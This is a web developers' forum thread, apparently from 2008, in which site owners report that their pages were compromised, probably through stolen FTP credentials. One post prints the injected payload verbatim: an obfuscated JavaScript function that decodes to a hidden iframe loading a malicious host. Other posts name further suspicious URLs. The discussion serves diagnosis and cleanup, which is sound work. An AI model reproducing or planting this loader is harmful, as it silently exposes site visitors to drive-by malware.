Website accessing unknown URL

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
manis
Forum Newbie
Posts: 8
Joined: Tue Oct 07, 2008 12:12 pm

Website accessing unknown URL

Post by manis »

My website php/mysql is fetching data from unkown urls: example google-stats.cn, googlezet.net..& few more. I did a find through the entire website folder but could not find these URLS. This seem to be very difficult to be solved?
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Website accessing unknown URL

Post by Mordred »

URL?
manis
Forum Newbie
Posts: 8
Joined: Tue Oct 07, 2008 12:12 pm

Re: Website accessing unknown URL

Post by manis »

Thanks for your reply. At this instance I will not be able to reveal you the URL due to confidentiality agreement with my customer. If you can relate the problem & give me information to identify & resolve issues will be of great help.

This is the only site in the search I could figure out some info.
http://webhelper4u.net/whmembers/sitesl ... alphaA.txt


Thank you again for your reply, I will look forward for your advice.
manis
Forum Newbie
Posts: 8
Joined: Tue Oct 07, 2008 12:12 pm

Re: Website accessing unknown URL

Post by manis »

This is what the code has created to a index file but this variables are dynamic & get generated on almost any file.

<!-- o --><script type="text/javascript">function jgouxhcixerkio(gqnfvwqckkaxvgg){var xlwqrzxo="";for(mxkoehci=0;mxkoehci<gqnfvwqckkaxvgg.length;mxkoehci+=2){xlwqrzxo+=(String.fromCharCode(parseInt(gqnfvwqckkaxvgg.substr(mxkoehci,2),16)));}document.write(xlwqrzxo);}jgouxhcixerkio("3C696672wqxeru61wqxeru6Dwqxeru65wqxeru20wqxeru737263wqxeru3D22wqxeru68wqxeru747470wqxeru3Awqxeru2F2Fwqxeru676Fwqxeru6Fwqxeru67wqxeru6C652Dwqxeru73wqxeru746174732E636E2F7371wqxeru6Cwqxeru2Fwqxeru69wqxeru6Ewqxeru2Ewqxeru636769wqxeru3Fwqxeru646566wqxeru6175wqxeru6C7422wqxeru206672wqxeru61wqxeru6D65626Fwqxeru72wqxeru6465wqxeru723Dwqxeru22wqxeru30wqxeru222062wqxeru6Fwqxeru7264wqxeru65wqxeru72wqxeru3Dwqxeru2230222077wqxeru69wqxeru6474683Dwqxeru22wqxeru3022206865wqxeru69676874wqxeru3Dwqxeru22wqxeru30wqxeru22wqxeru2073wqxeru74wqxeru79wqxeru6C65wqxeru3Dwqxeru22706Fwqxeru73wqxeru6974wqxeru696Fwqxeru6E3A2061wqxeru62wqxeru736Fwqxeru6C7574653Bwqxeru20wqxeru76wqxeru6973wqxeru6962696Cwqxeru69wqxeru74wqxeru79wqxeru3A20wqxeru68wqxeru69wqxeru6464656E3Bwqxeru20wqxeru64wqxeru69wqxeru73wqxeru706Cwqxeru61wqxeru79wqxeru3A206Ewqxeru6F6E65wqxeru223E3C2Fwqxeru69wqxeru66wqxeru7261wqxeru6D653Ewqxeru".replace(/wqxeru/g, ""));</script><!-- c -->
pobise
Forum Newbie
Posts: 1
Joined: Wed Oct 08, 2008 6:50 am
Location: Sweden

Re: Website accessing unknown URL

Post by pobise »

I have experinced the same thing!
On one of my clients FTP account, in a index.html file the function "function jgouxhcixerkio" was inserted
and the jpg image loaded on that page was edited with a url to
"[http://srq3h.com/center/movies/images/luk/index.php]" witch I suppose will load even more crap if you go there...

When I searched the site I found additional pages that had the
"function jgouxhcixerkio" or similar as function pkjrwddej(nhehhbxp) etc.

I have asked the web hotel to change the password to the FTP account,
made the index, and jpg-file not editable (write protected),
scanned my computer for viruses etc and cleaned it! --> several cockies deleted.

Now I hope this will solve the problem if any 'ganster' got hold of the ftp_account login.

any one else experienced this?
manis
Forum Newbie
Posts: 8
Joined: Tue Oct 07, 2008 12:12 pm

Re: Website accessing unknown URL

Post by manis »

What we have done as a immediate fix is we changed all the common file names ex: index, config, login..etc. This has solved the issue but I am not sure if this has also infected other files.
I will also change the ftp access pass. How these kind of attacks can be prevented in the future. Do you know any software which can scan the website(offline) for exploits?

Thanks Again! Great Help!

Manis
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: Website accessing unknown URL

Post by Mordred »

This sounds like a "local" problem - it happens that your machine (that is used to FTP to the site) has some malware on it, which has sniffed the FTP password and injected the code. Reupload your site from a clean machine and see if it helps.
manis
Forum Newbie
Posts: 8
Joined: Tue Oct 07, 2008 12:12 pm

Re: Website accessing unknown URL

Post by manis »

This might be true. I have cleaned the system & uploaded the code again. I am waiting to see any changes.

Is there any tool/software which can manage security? Whatsover infection it will clean the code on the local?

Thanks!
Manis
Post Reply